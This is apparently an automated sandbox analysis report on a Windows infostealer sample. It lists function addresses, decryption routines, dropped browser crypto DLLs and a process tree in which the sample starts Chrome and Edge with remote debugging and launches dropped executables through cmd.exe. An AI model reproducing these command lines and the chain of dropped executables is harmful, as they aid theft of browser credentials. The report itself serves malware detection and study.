Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C979F00 0_2_6C979F00
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9960A0 0_2_6C9960A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9D50C7 0_2_6C9D50C7
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C98C0E0 0_2_6C98C0E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9A58E0 0_2_6C9A58E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C977810 0_2_6C977810
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9AB820 0_2_6C9AB820
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9B4820 0_2_6C9B4820
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C988850 0_2_6C988850
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C98D850 0_2_6C98D850
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9AF070 0_2_6C9AF070
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9A5190 0_2_6C9A5190
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9C2990 0_2_6C9C2990
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C99D9B0 0_2_6C99D9B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C96C9A0 0_2_6C96C9A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C98A940 0_2_6C98A940
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9BB970 0_2_6C9BB970
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9DB170 0_2_6C9DB170
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C97D960 0_2_6C97D960
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9DBA90 0_2_6C9DBA90
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C97CAB0 0_2_6C97CAB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9D2AB0 0_2_6C9D2AB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9622A0 0_2_6C9622A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C994AA0 0_2_6C994AA0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9A8AC0 0_2_6C9A8AC0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C981AF0 0_2_6C981AF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9AE2F0 0_2_6C9AE2F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9A9A60 0_2_6C9A9A60
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C96F380 0_2_6C96F380
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9D53C8 0_2_6C9D53C8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9AD320 0_2_6C9AD320
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C965340 0_2_6C965340
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C97C370 0_2_6C97C370
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA0ECC0 0_2_6CA0ECC0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA6ECD0 0_2_6CA6ECD0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CAEAC30 0_2_6CAEAC30
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CAD6C00 0_2_6CAD6C00
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA1AC60 0_2_6CA1AC60
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA14DB0 0_2_6CA14DB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CAA6D90 0_2_6CAA6D90
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB9CDC0 0_2_6CB9CDC0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB98D20 0_2_6CB98D20
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CADED70 0_2_6CADED70
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB3AD50 0_2_6CB3AD50
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA96E90 0_2_6CA96E90
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA1AEC0 0_2_6CA1AEC0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CAB0EC0 0_2_6CAB0EC0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CAF0E20 0_2_6CAF0E20
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CAAEE70 0_2_6CAAEE70
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB58FB0 0_2_6CB58FB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA1EFB0 0_2_6CA1EFB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA10FE0 0_2_6CA10FE0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CAEEFF0 0_2_6CAEEFF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB50F20 0_2_6CB50F20
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA16F10 0_2_6CA16F10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CAD2F70 0_2_6CAD2F70
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA7EF40 0_2_6CA7EF40
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB168E0 0_2_6CB168E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA60820 0_2_6CA60820
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA9A820 0_2_6CA9A820
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CAE4840 0_2_6CAE4840
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CAA09A0 0_2_6CAA09A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CACA9A0 0_2_6CACA9A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CAD09B0 0_2_6CAD09B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB2C9E0 0_2_6CB2C9E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA449F0 0_2_6CA449F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA66900 0_2_6CA66900
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA48960 0_2_6CA48960
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA8EA80 0_2_6CA8EA80
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CAC8A30 0_2_6CAC8A30
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CABEA00 0_2_6CABEA00
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA8CA70 0_2_6CA8CA70
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CAB0BA0 0_2_6CAB0BA0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB16BE0 0_2_6CB16BE0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB3A480 0_2_6CB3A480
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA564D0 0_2_6CA564D0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CAAA4D0 0_2_6CAAA4D0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA74420 0_2_6CA74420
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA9A430 0_2_6CA9A430
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA28460 0_2_6CA28460
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA045B0 0_2_6CA045B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CADA5E0 0_2_6CADA5E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA9E5F0 0_2_6CA9E5F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA72560 0_2_6CA72560
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CAB0570 0_2_6CAB0570
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB58550 0_2_6CB58550
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA68540 0_2_6CA68540
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB14540 0_2_6CB14540
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA6E6E0 0_2_6CA6E6E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CAAE6E0 0_2_6CAAE6E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA346D0 0_2_6CA346D0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA6C650 0_2_6CA6C650
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA3A7D0 0_2_6CA3A7D0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA90700 0_2_6CA90700
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA200B0 0_2_6CA200B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CAEC0B0 0_2_6CAEC0B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA08090 0_2_6CA08090
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CADC000 0_2_6CADC000
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CAD8010 0_2_6CAD8010
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA5E070 0_2_6CA5E070
Source: C:\Users\user\Documents\KKFBAAFCGI.exe Code function: 14_2_004E7049 14_2_004E7049
Source: C:\Users\user\Documents\KKFBAAFCGI.exe Code function: 14_2_004E8860 14_2_004E8860
Source: C:\Users\user\Documents\KKFBAAFCGI.exe Code function: 14_2_004E78BB 14_2_004E78BB
Source: C:\Users\user\Documents\KKFBAAFCGI.exe Code function: 14_2_004E31A8 14_2_004E31A8
Source: C:\Users\user\Documents\KKFBAAFCGI.exe Code function: 14_2_005B7B6E 14_2_005B7B6E
Source: C:\Users\user\Documents\KKFBAAFCGI.exe Code function: 14_2_004A4B30 14_2_004A4B30
Source: C:\Users\user\Documents\KKFBAAFCGI.exe Code function: 14_2_004E2D10 14_2_004E2D10
Source: C:\Users\user\Documents\KKFBAAFCGI.exe Code function: 14_2_004A4DE0 14_2_004A4DE0
Source: C:\Users\user\Documents\KKFBAAFCGI.exe Code function: 14_2_004D7F36 14_2_004D7F36
Source: C:\Users\user\Documents\KKFBAAFCGI.exe Code function: 14_2_004E779B 14_2_004E779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 15_2_00E978BB 15_2_00E978BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 15_2_00E98860 15_2_00E98860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 15_2_00E97049 15_2_00E97049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 15_2_00E931A8 15_2_00E931A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 15_2_00E54B30 15_2_00E54B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 15_2_00E54DE0 15_2_00E54DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 15_2_00E92D10 15_2_00E92D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 15_2_00E9779B 15_2_00E9779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 15_2_00E87F36 15_2_00E87F36
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 16_2_00E978BB 16_2_00E978BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 16_2_00E98860 16_2_00E98860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 16_2_00E97049 16_2_00E97049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 16_2_00E931A8 16_2_00E931A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 16_2_00E54B30 16_2_00E54B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 16_2_00E54DE0 16_2_00E54DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 16_2_00E92D10 16_2_00E92D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 16_2_00E9779B 16_2_00E9779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 16_2_00E87F36 16_2_00E87F36
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: String function: 00E6DF80 appears 36 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: String function: 00E680C0 appears 260 times
Source: C:\Users\user\Documents\KKFBAAFCGI.exe Code function: String function: 004B80C0 appears 130 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 6C99CBE8 appears 134 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 6CB9DAE0 appears 43 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 6C9A94D0 appears 90 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 6CB909D0 appears 175 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 6CA33620 appears 47 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 6CA39B10 appears 39 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 6CB9D930 appears 34 times
Sample file is different than original file name gathered from version info
Source: file.exe, 00000000.00000002.2695257510.000000000B932000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCmd.Exe.MUIj% vs file.exe
Source: file.exe, 00000000.00000002.2695257510.000000000B932000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCmd.Exej% vs file.exe
Source: file.exe, 00000000.00000002.2706404847.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmp Binary or memory string: OriginalFilenamemozglue.dll0 vs file.exe
Source: file.exe, 00000000.00000002.2706824364.000000006CBE5000.00000002.00000001.01000000.00000009.sdmp Binary or memory string: OriginalFilenamenss3.dll0 vs file.exe
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe Static PE information: Section: jimnplje ZLIB complexity 0.995089518714584
Source: KKFBAAFCGI.exe.0.dr Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: skotes.exe.14.dr Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: random[1].exe.0.dr Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@38/51@8/8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9C7030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree, 0_2_6C9C7030
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\1RXGFH1R.htm Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7260:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Users\user\Documents\KKFBAAFCGI.exe File created: C:\Users\user\AppData\Local\Temp\abc3bc1985 Jump to behavior
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: file.exe, 00000000.00000002.2705790342.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2688816179.000000000590B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2706693269.000000006CB9F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: file.exe, 00000000.00000002.2705790342.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2688816179.000000000590B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2706693269.000000006CB9F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: file.exe, 00000000.00000002.2705790342.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2688816179.000000000590B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2706693269.000000006CB9F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: file.exe, 00000000.00000002.2705790342.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2688816179.000000000590B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2706693269.000000006CB9F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: file.exe, file.exe, 00000000.00000002.2705790342.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2688816179.000000000590B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2706693269.000000006CB9F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: file.exe, 00000000.00000002.2705790342.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2688816179.000000000590B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: file.exe, 00000000.00000002.2705790342.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2688816179.000000000590B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2706693269.000000006CB9F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: file.exe, 00000000.00000003.2455813939.00000000057ED000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2321711994.00000000057F9000.00000004.00000020.00020000.00000000.sdmp, HCBGDGCAAKJEBFIDBAAA.0.dr, EGIIIECBGDHJJKFIDAKJ.0.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe, 00000000.00000002.2705790342.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2688816179.000000000590B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: file.exe, 00000000.00000002.2705790342.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2688816179.000000000590B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
Source: file.exe ReversingLabs: Detection: 39%
Source: file.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2544 --field-trial-handle=2456,i,1902125233543609165,9231231568484545527,262144 /prefetch:8
Source: C:\Users\user\Desktop\file.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=""
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2116 --field-trial-handle=2144,i,5035712571397325000,14333808649513033406,262144 /prefetch:3
Source: unknown Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2272 --field-trial-handle=2116,i,13794285038961054582,12018302173444175228,262144 /prefetch:3
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\Documents\KKFBAAFCGI.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\Documents\KKFBAAFCGI.exe "C:\Users\user\Documents\KKFBAAFCGI.exe"
Source: C:\Users\user\Documents\KKFBAAFCGI.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\Desktop\file.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="" Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="" Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\Documents\KKFBAAFCGI.exe" Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2544 --field-trial-handle=2456,i,1902125233543609165,9231231568484545527,262144 /prefetch:8 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2116 --field-trial-handle=2144,i,5035712571397325000,14333808649513033406,262144 /prefetch:3 Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2272 --field-trial-handle=2116,i,13794285038961054582,12018302173444175228,262144 /prefetch:3 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\Documents\KKFBAAFCGI.exe "C:\Users\user\Documents\KKFBAAFCGI.exe" Jump to behavior
Source: C:\Users\user\Documents\KKFBAAFCGI.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ncrypt.dll Jump to behavior
